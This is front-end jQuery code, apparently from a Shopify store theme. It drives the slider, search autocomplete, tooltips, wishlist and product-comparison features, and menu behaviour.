
  var delay = this.data('speed'),
      fullscreen = this.attr('data-fullscreen') == 'false' ? false : 768,
      width = this.attr('data-width'),
      height = this.attr('data-height');

  if(this.hasClass('revolution-default')) {
    var respheight1 = width <= 970 ? (height || 1200) : 1000;
    var respheight2 = width <= 970 ? (height || 1200) : 1500;

    this.resizeRevolution(
      {
        slider: '.tp-banner',
        breakpoints: [414, 767, 1025],
        fullscreen_BP: fullscreen,
        functions: [
          click_to_play_video,
          autoplay_video
        ]
      },
      {
        fullScreenOffsetContainer: "header",
        navigationArrows: "true",
        startwidth: width || 1920,
        startheight: height || 800
      },
      [
        {
          bp: [0, 790],
          startheight: respheight1,
        },
        {
          bp: [0, 600],
          startheight: respheight1,
        },
        {
          bp: [0, 460],
          startheight: respheight2
        }
      ],
      delay
     );
  }
  else {
    this.resizeRevolution(
      {
        slider: '.tp-banner',
        breakpoints: [414, 767, 1025],
        fullscreen_BP: 768,
        functions: [
          click_to_play_video,
          autoplay_video
        ]
      },
      {
        fullScreenOffsetContainer: "header-static"
      }, 
      [
        {
          bp: [0, 768],
          startheight: 1300
        },
        {
          bp: [0, 1025],
          fullScreenOffsetContainer: "header"
        }
      ],
      delay
    );
  }
}

$('body').on(
  'click', '.pt-review, .pt-rating', function(e){
    if($(this).closest('.pt-review').length) {
      $('#tab_review').length && findAndViewReviews();
    }
    else{
      window.location = $(this).closest('.pt-rating').data('url') + '?tab_review';
    }
  }
)
$(document).ready(function() {
  var s = window.location.search;
  if(s.indexOf('tab_review') == -1 || $('#tab_review').length == 0) return false;
  setTimeout(findAndViewReviews, 2000);
});
function findAndViewReviews(){
  var y = $('#tab_review').offset().top;
  var d = $('.pt-stuck-nav').length && $('.pt-stuck-nav.disabled').length == 0 ? $('.pt-stuck-nav').height() : 0;
  $('html, body').animate({
    scrollTop: y-d
  }, 500);
  if($('#tab_review').hasClass('nav-link')){
    $('#tab_review').trigger('click');
  }
  else{
    !$('#tab_review').hasClass('active') && $('#tab_review').find('.pt-collapse-title').trigger('click');
  }
}

/* Search autocomplite */
$(function() {
  // Current Ajax request.
  var currentAjaxRequest = null;
  // Grabbing all search forms on the page, and adding a .search-results list to each.
  var searchForms = $('form[action="/search"]').each(function() {
    // Grabbing text input.
    var input = $(this).find('input[name="q"]');
    // Adding a list for showing search results.
    var offSet = input.position().top + input.innerHeight() + 1;
    $('<div class="search-results"></div>').appendTo($(this)).hide();
    // Listening to keyup and change on the text field within these search forms.
    input.attr('autocomplete', 'off').bind('keyup change', function() {
      // What's the search term?
      var term = $(this).val();
      // What's the search form?
      var form = $(this).closest('form');
      // What's the search URL?
      var searchURL = '/search?type=product&q=' + term;
      // What's the search results list?
      var resultsList = form.find('.search-results');
      // If that's a new term and it contains at least 3 characters.
      if (term.length > 3 && term != $(this).attr('data-old-term')) {
        // Saving old query.
        $(this).attr('data-old-term', term);
        // Killing any Ajax request that's currently being processed.
        if (currentAjaxRequest != null) currentAjaxRequest.abort();
        // Pulling results.
        currentAjaxRequest = $.getJSON(searchURL + '&view=json', function(data) {
          // Reset results.
          resultsList.empty();
          // If we have no results.
          if(data.results_count == 0) {
            resultsList.hide();
          } else {
            var resultsList_ul = resultsList.append('<ul></ul>');
            resultsList_ul = resultsList_ul.find('ul');
            // If we have results.
            $.each(data.results, function(index, item) {
              if(index >= 6) return false;
              var link = $('<a></a>').attr('href', item.url);
              link.append('<div class="thumbnail"><img src="' + item.thumbnail + '" /></div>');
              link.append('<div class="pt-description"><div class="pt-title">' + item.title + '</div></div>');
              link.wrap('<li></li>');
              resultsList_ul.append(link.parent());
            });
            // The Ajax request will return at the most 10 results.
            // If there are more than 10, let's link to the search results page.
            if(data.results_count > 6) {
              resultsList.append('<div class="pt-view-all"><a href="' + searchURL + '">'+seeallresults+' (' + data.results_count + ')</a></div>');
            }
            resultsList.fadeIn(200);
          }
        });
      }
    });
  });
  // Clicking outside makes the results disappear.
  $('body').bind('click', function(){
    $('.search-results').hide();
  });
});

$('.pt-carousel-products-js').length || $('.pt-carousel-products').length && initProductsSlickResize();
function initProductsSlickResize(){
  $(window).resize(function(){
    $('.pt-carousel-products').length && $('.pt-carousel-products').slick('setPosition');
    $('.pt-carousel-products-js').length && $('.pt-carousel-products-js').slick('setPosition');
  })
}

$(document).ready(function() {
  if($(".menu_language_holder").length == 0) return false;
  setTimeout(wgDefault, 100);
});
function wgDefault(){
  if($(".wg-default").length == 0) return false;
  var css_link = $(".menu_language_holder").data("css");
  var wgDefault = $(".wg-default").detach().addClass("menu_language_holder");
  var $ul = $(".menu_language_holder");
  $ul.replaceWith(wgDefault);
  $('<link href="' + css_link + '" rel="stylesheet" type="text/css" media="all">').appendTo('body');
}

var tooltip = {
  html_i: '#pt-tooltip-popup',
  html_s: '<div id="pt-tooltip-popup"><span>',
  html_e: '</span><i></i></div>',
  tp_attr: '[data-tooltip]',
  tp_mod: false,
  init: function(){
    this.tp_mod = this.get_tp_mod();
    if(!this.tp_mod.length || /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) return false;
    this.handler();
  },
  get_tp_attr: function(){
    return this.tp_attr;
  },                     
  get_tp_mod: function(){
    return $(this.get_tp_attr());
  },
  get_w_width: function(){
    return window.innerWidth || $window.width();
  },
  get_html_obj: function(name){
    return this.html_s + name + this.html_e;
  },
  check_pr_page_swatches: function($obj){
    var swc = $obj.closest('.pt-swatches-container');
    var search = $obj.closest('.pt-search');
    var qv = $obj.closest('.pt-btn-quickview');
    var cc = $obj.closest('.pt-collapse-content');
    var wl = $obj.closest('.wlbutton-js');
    var co = $obj.closest('.compare-js');
    if(!swc.length && !search.length && !qv.length && !cc.length && !wl.length && !co.length) return false;
    return true;
  },
  handler: function(){
    var _ = this;
    $('body').on('mouseenter mouseleave', this.get_tp_attr(), function(e){
      var ww = _.get_w_width();
      if(ww <= 1024) return false;
      if (e.type === 'mouseenter') _.onHover($(this));
      if (e.type === 'mouseleave') _.offHover($(this));
    });
  },
  onHover: function($obj){
    var _ = this,
    	value = $obj.attr('data-tooltip'),
        $o = $(this.get_html_obj(value)),
        tposition = $obj.attr('data-tposition'),
        ftag = $obj.attr('data-findtag');
    
    if(value == "") return false;
    
    $body.append($o);

    var $objforsize = typeof ftag != 'undefined' ? $obj.find(ftag).first() : $obj,
        th = $o.innerHeight(),
        tw = $o.innerWidth(),
        oh = $objforsize.innerHeight(),
        ow = $objforsize.innerWidth(),
        v = $objforsize.offset().top,
        h = $objforsize.offset().left;

    tposition = typeof tposition != 'undefined' ? tposition : 'top';

    if(tposition == 'top'){
      v += - th - 20;
      h += parseInt((ow - tw)/2);
    }
    if(tposition == 'bottom'){
      v += oh + 24;
      h += parseInt((ow - tw)/2);
    }
    if(tposition == 'left'){
      v += parseInt((oh-th)/2);
      h += - tw - 24;
    }
    if(tposition == 'right'){
      v += parseInt((oh-th)/2);
      h += ow + 24;
    }

    this.showTooltip($o, h, v, tposition);
    
    if(!this.check_pr_page_swatches($obj)) return false;
    $obj.on('click.closeTooltip', function(){
      _.offHover($(this));
      $(this).unbind( "click.closeTooltip" );
    })
  },
  offHover: function($obj){
    $body.find(this.html_i).remove();
    
    if(!this.check_pr_page_swatches($obj)) return false;
    $obj.unbind( "click.closeTooltip" );
  },
  showTooltip: function($o, h, v, p){
    p = p || 'top';
    var a = {opacity: 1},
        k = p;
    if(k == 'bottom') k = 'top';
    if(k == 'right') k = 'left';

    a[k] = p == 'bottom' || p == 'right' ? '-=10px' : '+=10px';

    $o.css({'top': v, 'left' : h}).addClass('tooltip-' + p).animate(a, 200);
  }
}
$(document).ready(function() {
  tooltip.init();
});

var wl_handler = {
  action_r: 'wk-remove',
  action_a: 'wk-add',
  loader_t: 'Be patient',
  tooltip: '#pt-tooltip-popup',
  noevents: 'wkapp_load',
  init: function(){
    if(!$('.wlbutton-js').length) return false;

    var _ = this;

    $('body').on('click', '.wlbutton-js', function(e){
      e.preventDefault();
      if($(this).hasClass(_.noevents)) return false;

      if(_.getcustomerid() == ''){
        $('#ModalMessage').modal('show');
        return false;
      }

      var $this = $(this),
          data = {
            action: $this.attr('data-action'),
            text_a: $this.attr('data-add'),
            text_r: $this.attr('data-remove'),
            namespace: $this.attr('data-type'),
            key: $this.attr('data-productid'),
            value: $this.attr('data-producth'),
          };

      $this.addClass(_.noevents).attr('data-tooltip', _.loader_t).trigger('mouseenter');
      data.action == _.action_a ? _.add_handler($this, data) : _.remove_handler($this, data);
    });
  },
  getcustomerid: function(){
    return yanka_app.main_info.customerid;
  },
  getloadertext: function(){
    return yanka_app.loader_text;
  },
  getappurl: function(){
    return 'https://'+yanka_app.url;
  },
  add_handler: function($el, obj){
    var _ = this;

    $.ajax({
      type: "POST",
      url: _.getappurl()+'/api/add',
      data: $.extend({}, yanka_app.main_info, {
        namespace: obj.namespace,
        key: obj.key,
        value: obj.value
      }),
      cache: false,
      success: function(data) {
        console.log('done');

        $el.removeClass(_.noevents)
        .attr('data-action', _.action_r)
        .attr('data-tooltip', obj.text_r);

        if($el.hasClass('prpagebtn-js')){
          var s = $el.attr('data-prpage-rem');
          $el.find('span').last().text(s);
        }

        $el.is(':hover') && $el.trigger('mouseleave').trigger('mouseenter');
        
        if($('.pt-wishlist.pt-dropdown-obj').length){
          $('.pt-wishlist.pt-dropdown-obj').find('.pt-badge').each(function(){
            var i = Number($(this).text()) + 1;
            $(this).text(i).show();
          });
        }
      },
      error: function(XMLHttpRequest, textStatus) {
        alert("error");
        $el.removeClass(_.noevents);
      }
    })
  },
  remove_handler: function($el, obj){
    var _ = this;

    $.ajax({
      type: "POST",
      url: _.getappurl()+'/api/delete',
      data: $.extend({}, yanka_app.main_info, {
        namespace: obj.namespace,
        key: obj.key,
        _method: 'DELETE'
      }),
      cache: false,
      success: function(data) {        
        console.log('done');

        if($el.closest('.wkpageinfo').length){
          $el.closest('.product-parent').parent().fadeOut(400, function() {
            $el.is(':hover') && $el.trigger('mouseleave');
            var $p = $(this).parent();
            $(this).remove();
            if(!$p.children().length){
              $p.closest('.wkpageinfo').parent().find('.wkpagenoinfo').removeClass('hide')
              .parent().find('.wkpageinfo').remove();
            }
          });
        }
        else{
          $el.removeClass(_.noevents)
          .attr('data-action', _.action_a)
          .attr('data-tooltip', obj.text_a);

          $el.is(':hover') && $el.trigger('mouseleave').trigger('mouseenter');

          if($el.hasClass('prpagebtn-js')){
            var s = $el.attr('data-prpage-add');
            $el.find('span').last().text(s);
          }
        }
        
        if($('.pt-wishlist.pt-dropdown-obj').length){
          $('.pt-wishlist.pt-dropdown-obj').find('.pt-badge').each(function(){
            var i = Math.max(0, parseInt($(this).text())-1);
            $(this).text(i);
            i == 0 && $(this).hide();
          });
        }
      },
      error: function(XMLHttpRequest, textStatus) {
        alert("error");
        $el.removeClass(_.noevents);
      }
    })
  }
}
wl_handler.init();

var ct = {
  mainc: '.pt-compare-table-js',
  slider: $('#pt-compare-table').find('.compare-init-slider'),
  init: function(){
    if(!$(this.mainc).length) return false;
    $(window).resize(ct.resizeHandler);
  },
  handler: function(){
    var a = this.getSizes();
    this.setSizes(a);
    this.slider.slick('slickGoTo', 0);
    $('.pt-compare-table').removeAttr('style');
    a = false;
    setTimeout(function(){
      ct.replaceSliderArrows($('.pt-image-box-last').first().position().top);
    }, 200)
  },
  setSizes: function(a){
    $(this.mainc).each(function(){
      $(this).children().each(function(index){
        $(this).outerHeight(a[index], true);
      });
    })
  },
  getSizes: function(){
    var a = [];
    $(this.mainc).each(function(){
      $(this).children().each(function(index){
        a[index] = typeof a[index] != 'undefined' ? a[index] : 0;
        a[index] = Math.max(a[index], $(this).outerHeight(true));
      });
    })
    return a
  },
  resizeHandler: function(t){
    if(!$.isNumeric(t)) t = 200;
    $('.pt-compare-table').css({opacity: 0})
    $(ct.mainc).children().removeAttr('style');
    $(ct.mainc).find('.pt-btn-addtocart').removeAttr('style');
    setTimeout(function(){
      ct.handler();
    }, t);
  },
  replaceSliderArrows: function(h){
    var prev = $('.compare-init-slider').find('.slick-prev'),
        next = $('.compare-init-slider').find('.slick-next'),
        bh = prev.height(),
        c = parseInt((h-bh)/2);

    prev.addClass('showarr').css({top: c});
    next.addClass('showarr').css({top: c});
  },
  sliderinit: function(){
    this.slider.slick({
      dots: false,
      arrows: true,
      infinite: true,
      speed: 300,
      slidesToShow: 3,
      slidesToScroll: 1,
      adaptiveHeight: true,
      responsive: [
        {
          breakpoint: 1025,
          settings: {
            slidesToShow: 2,
          }
        },
        {
          breakpoint: 790,
          settings: {
            slidesToShow: 1
          }
        }
      ]
    });
  },
  sliderunslick: function(){
    this.slider.slick('unslick');
  }
}
var compare = {
  search: '&view=getproduct',
  a_a: 'wk-add',
  a_d: 'wk-remove',
  space: 'comparedata',
  com_json: {},
  com_count: 0,
  com_limit: 0,
  init: function(){
    var _ = this;
    this.comparepage();

    if(!$('.compare-js').length) return false;

    this.selected();
    $(window).on( "compareevent", function(){
      var o = $('.compare-js');
      o.length && o.attr('data-action', _.a_a).attr('data-tooltip', o.attr('data-add'));
      _.setPageButtonText(o, 'data-prpage-add');
      compare.selected();
    });

    $('body').on('click', '.compare-js', function(e){
      e.preventDefault();
      var $this = $(this);
      $this.attr('data-action') == _.a_a ? compare.setdata($this) : compare.deletedata($this);
      _.setItemLengthInBadge();
    })
  },
  comparepage: function(){
    if(!$('.comparepage').length || !this.checkEmptyPage()) return false

    $('.comparepage').removeClass('hide');

    var _ = this,
        l = $.parseJSON(localStorage[compare.space]);

    this.com_limit = _.getjsonsize(l);

    $.each(l, function(index, value){
      _.getproduct(index, value);
    });
  },
  createcomparepage: function(l){
    var _ = this,
        p = $('.compare-init-slider'),
        b = $('.compareitemhtml').find('.pt-item');

    this.setOptionsTable(l, b);

    var count = Object.keys(l).length;
    $('.pt-col-item').attr('data-grid', count);

    $.each(l, function (index, value) {
      var o = b.clone();
      o.find('.pt-remove-item').attr('data-compareid', index);
      o.find('.pt-img').find('a').attr('href', value.url).find('img').attr('src', value.image);
      o.find('.pt-title').find('a').text(value.title).attr('href', value.url);

      if(value.price < value['compare price']){
        o.find('.pt-price').find('.new-price').html(value.price);
        o.find('.pt-price').find('.old-price').html(value['compare price']);
      }
      else{
        o.find('.pt-price').find('.new-price').html(value.price).removeClass('new-price');
        o.find('.pt-price').find('.old-price').remove();
      }

      if(!Boolean(value.available)){
        o.find('.co-btn-addtocart').closest("form").remove();
        o.find('.pt-label-location').children().first().remove();
      }

      o.find('form').find('input').val(index);

      $.each(value.data, function (index, value) {
        var o2 = o.find('[data-val="'+index+'"]');
        o2.length && o2.html(value);
      });

      $.each(value.options, function (index, value) {
        var o2 = o.find('[data-val="'+index+'"]');
        o2.length && o2.html(value);
      });

      p.append(o);
    });

    $('body').trigger('refreshCurrency');
    setTimeout(function(){
      $(window).trigger('resize');
      ct.sliderinit();
      $(window).trigger('resize');
    }, 500);
  },
  checkEmptyPage: function(){
    var d = localStorage[compare.space];
    if(d = d === undefined || d === "undefined"){
      $('.comparepageempty').removeClass('hide');
      $('.comparepage').remove();
      $('.compareitemhtml').remove();
      return false;
    }
    return true;
  },
  setOptionsTable: function(l, $obj){
    var t = $('.pt-value[data-val="empty"]');
    var tmp = $('.pt-col-title.pt-compare-table-js');
    var tm = $('.title-item[data-val="maintable"]');
    var a = [];

    if(!tm.length) return false;

    $.each(l, function (index, value) {
      $.each(value.options, function (index, value) {
        index != "Title" && !a.includes(index) && a.push(index);
      });
    });
    if(a.length == 0) return false;
    for(var i=0; i<a.length; i++){
      $obj.append(t.clone().attr('data-val', a[i]))
      tmp.append(tm.clone().text(a[i]));
    }
  },
  selected: function(){
    var d = localStorage[compare.space];
    if(d = d === undefined || d === "undefined") return false;

    var _ = this,
        l = $.parseJSON(localStorage[compare.space]);
    $.each(l, function (index, value) {
      var o = $('[data-compareid="'+index+'"]');
      o.length && o.attr('data-action', _.a_d).attr('data-tooltip', o.attr('data-remove'));
      _.setPageButtonText(o, 'data-prpage-rem');
    });
  },
  setPageButtonText: function(o, attr){
    if(o.hasClass('prpagebtn-js')){
      var s = o.attr(attr);
      o.find('span').last().text(s);
    }
  },
  getproduct: function(id, url){
    var _ = this,
        u = url+'?variant='+id+this.search;
    var params = {
      type: "get",
      url: u,
      success: function(data) {

        compare.com_json[id] = $.parseJSON(data);

        if(compare.com_json[id].hasOwnProperty('url')){
          compare.com_json[id]['url'] = url+'?variant='+id;
        }

        compare.checkloadwnd();
      },
      error: function(XMLHttpRequest, textStatus) {
        compare.deleteitem(id);
        compare.checkloadwnd();
        console.log('product not found');
      }
    };
    jQuery.ajax(params);
  },
  checkloadwnd:function(){
    compare.com_count += 1;
    if(compare.com_limit <= compare.com_count){
      compare.createcomparepage(compare.com_json);
    }
  },
  getjsonsize: function(value){
    return Object.keys(value).length;
  },
  setdata: function($obj){
    var _ = this,
        d = localStorage[compare.space],
        da = $obj.attr('href'),
        value = this.getid($obj);

    d = d === undefined || d === "undefined" ? false : d;

    if(d){
      d = $.parseJSON(d);
      d[value] = da;
      d = JSON.stringify(d);
    }
    else{
      var d = '{"'+value+'": "'+da+'"}';
    }

    localStorage[compare.space] = d;

    this.setPageButtonText($obj, 'data-prpage-rem');
    $obj.attr('data-action', _.a_d).attr('data-tooltip', $obj.attr('data-remove'));
    $obj.is(':hover') && $obj.trigger('mouseleave').trigger('mouseenter');
  },
  getid: function($obj){
    return $obj.attr('data-compareid');
  },
  deletedata: function($obj){
    var value = this.getid($obj),
        l = localStorage[compare.space];

    if(l === undefined || l === "undefined"){
      $obj.attr('data-action', this.a_a);
      return false;
    }
    l = $.parseJSON(l);

    this.deleteitem(value);
    var count = compare.getjsonsize(l);
    if(l.hasOwnProperty(value) && $('.comparepage').length){
      count -= 1;
      $obj.closest('.pt-item').fadeOut(function(){
        ct.sliderunslick();
        $('[data-compareid="'+value+'"]').each(function(){
          $(this).closest('.pt-item').remove();
        });
        $('.pt-col-item').attr('data-grid', count);
        ct.sliderinit();
        ct.resizeHandler(0);
        compare.checkEmptyPage();
      });
      return false;
    }

    this.setPageButtonText($obj, 'data-prpage-add');
    $obj.attr('data-action', this.a_a).attr('data-tooltip', $obj.attr('data-add'));
    $obj.is(':hover') && $obj.trigger('mouseleave').trigger('mouseenter');
  },
  deleteitem: function(value){
    var l = $.parseJSON(localStorage[compare.space])
    if(l.hasOwnProperty(value)){
      var count = compare.getjsonsize(l);
      if(count > 1){
        delete l[value];
        l = JSON.stringify(l);
        localStorage[compare.space] = l;
      }
      else{
        localStorage.removeItem(compare.space);
      }
    }
  },
  setItemLengthInBadge: function(){
    var l = localStorage[compare.space];
    if(l === undefined || l === "undefined"){
      $('.pt-compare').length && $('.pt-compare').find('.pt-badge').hide();
      return false;
    }
    l = $.parseJSON(l);
    l = Object.keys(l).length;
    $('.pt-compare').length && $('.pt-compare').find('.pt-badge').show().text(l);
  }
}
$( document ).ready(function(){
  compare.init();
  compare.setItemLengthInBadge();
  ct.init();
})


function initStickPrLeft(){
  var stickprcol = $('.stickprcol-js'),
      stickprcolheight = $('.stickprcolheight-js'),
      o = stickprcol.attr('data-o', stickprcol.offset().top);
  $('body').on('click', '.pt-collapse-title', function(){
    setTimeout(function(){
      setPosition();
    }, 200);
  })
  setTimeout(function(){
    setPosition();
  }, 500);
  $(window).resize(function(){
    stickprcol.css({top: 0});
    o = stickprcol.attr('data-o', stickprcol.offset().top);
    setTimeout(function(){
      setPosition();
    }, 100);
  }).scroll(function(){
    setPosition();
  })
  function setPosition(){
    typeof stickprcol.attr('css') !== typeof undefined && stickprcol.removeAttr('css');
    var h = stickprcol.children().length == 1 ? stickprcol.children().height() : stickprcol.height();
    if(h > $(window).height()) return false;
    if(h > stickprcolheight.height()) return false;
    
    if($(window).width() < 768) return false;
    var m = 68,
        o = stickprcol.attr('data-o'),
        p = stickprcol.position().top,
        w = $(window).scrollTop(),

        mh = stickprcolheight.height() - h - 10,

        ow = Math.max(0, w-o+m);
    ow = Math.min(mh, ow);

    stickprcol.css({top: ow});
    $('.zoomContainer').length && $('.zoomContainer').css({top: ow+m*2}); 
  }
}

function onerowActiontoInit(){
  if($('.pt-quantity').find('.pt-col-one').length){
   $('.pt-quantity').find('a').click(function(){ 
     $(this).hasClass('pt-col-one') ? onerowActiontoRight(true) : onerowActiontoBack();
   })
  }

  $(window).resize(function(){
    var b = $('.pt-product-listing').hasClass('pt-col-one');
    $(window).width() < 791 ? onerowActiontoBack() : onerowActiontoRight(b);
  })
  $('body').on('listingpageajax', function(){
    if(!$('.pt-product-listing').hasClass('pt-col-one')) return false;
    onerowActiontoRight(true);
  })
  if(!$('.pt-product-listing').hasClass('pt-col-one')) return false;
  onerowActiontoRight(true);
}
function onerowActiontoRight(isOneRow){
  isOneRow = false || isOneRow;
  if($(window).width() < 791 || !isOneRow) return false;
  $('.product-parent').each(function(){
    var o = $(this).find('.onerowactions');
    if(o.children().length) return true;
    var p = $(this).find('.pt-price').first().attr('data-par', 'backtottprice').wrap('<div class="backtottprice"/>').detach();
    $(this).find('.onerowactions').append(p);
    p = $(this).find('.pt-product-inside-hover').attr('data-par', 'backtorphov').wrap('<div class="backtorphov"/>').detach();
    $(this).find('.onerowactions').append(p);
  })
}
function onerowActiontoBack(){  
  $('.product-parent').each(function(){
    var o = $(this).find('.onerowactions');
    if(!o.children().length) return true;
    var p = o.find('.pt-price').first(),
        c = p.attr('data-par');
    $(this).find('.'+c).append(p.detach());
    $(this).find('.pt-price').first().unwrap();

    p = $(this).find('.pt-product-inside-hover');
    c = p.attr('data-par');
    $(this).find('.'+c).append(p.detach());
    $(this).find('.pt-product-inside-hover').unwrap();
  })
}

$(document).ready(function(){  
  $('.pt-col-one').length && onerowActiontoInit();
  $('.stickprcol-js').length && initStickPrLeft();

  var $body = $('body'),
      $fixedbg = $('#fixedbg');

  if(!$fixedbg.length){
    $body.append('<div id="fixedbg"></div>');
  };

  $(document).on('mouseenter mouseleave', '.pt-desctop-menu li.dropdown.pt-submenu', function(e){   
    if (typeof $('html').attr('id') === typeof undefined && $('html').attr('id') === false) return false;
    if ($('html').attr('id') == "pt-boxed") return false;
    
    var $this = $(this),
        windW = window.innerWidth,
        target = e.target;

    if (e.type === 'mouseenter' && windW > 1024) {
      ttOnHover();
    } else if (e.type === 'mouseleave' && windW > 1024) {
      ttOffHover();
    };
    function ttOnHover(e){
      if ($('.pt-stuck-nav').hasClass('stuck')){
        $('#fixedbg').stop().fadeIn(150);
      } else {
        $('#fixedbg').stop().fadeIn(150);
      };
      
      if($('.pt-menu-categories').length && $('.pt-menu-categories').hasClass('opened')){
        !$('.pt-menu-categories').parent().hasClass('categories-btn-noclick') && $('.pt-menu-categories').find('.pt-dropdown-menu').first().stop().fadeOut(150);
      }
      $('.pt-menu-categories').length && $('.pt-menu-categories').parent().hasClass('categories-btn-noclick') && $('.pt-menu-categories').parent().addClass('mainmenuishover');

      return false;
    };
    function ttOffHover(e){
      $('#fixedbg').stop().fadeOut(100);
      if($('.pt-menu-categories').length && $('.pt-menu-categories').hasClass('opened')){
        !$('.pt-menu-categories').parent().hasClass('categories-btn-noclick') && $('.pt-menu-categories').find('.pt-dropdown-menu').first().stop().fadeIn(100);
      }
      
      $('.pt-menu-categories').length && $('.pt-menu-categories').parent().hasClass('categories-btn-noclick') && $('.pt-menu-categories').parent().removeClass('mainmenuishover');
      
      return false;
    };
  });
  
  $('#pt-header').mouseleave(function(){
    setTimeout(function() {
      $('#pt-header').stop().removeAttr("style");
    }, 150);
  });
  
  $(window).resize(function() {
    $('#pt-header').stop().removeAttr("style");
    $('#fixedbg').hide();
  })
  $('body').on('showStuck hideStuck', function(){
    setTimeout(function(){
      if($('.pt-menu-categories').length && $('.pt-menu-categories').hasClass('opened')){
        !$('.pt-menu-categories').parent().hasClass('categories-btn-noclick') && $('.pt-menu-categories').find('.pt-dropdown-menu').first().stop().fadeIn();
      }

      $('.pt-menu-categories').length && $('.pt-menu-categories').parent().hasClass('categories-btn-noclick') && $('.pt-menu-categories').parent().removeClass('mainmenuishover');
    }, 160)
  })
})

$(document).ready(function(){
  setTimeout(function(){
    if($('.panel-menu').length && $('.weglot_switcher').length){
      $('.panel-menu').find('.weglot_switcher').find('a').on('click', function(){
        var id = $(this).parent().attr('id');
        $('.pt-desktop-header').find('#'+id).find('a').trigger('click');
        console.log(id);
      })
    }
  }, 100)
});
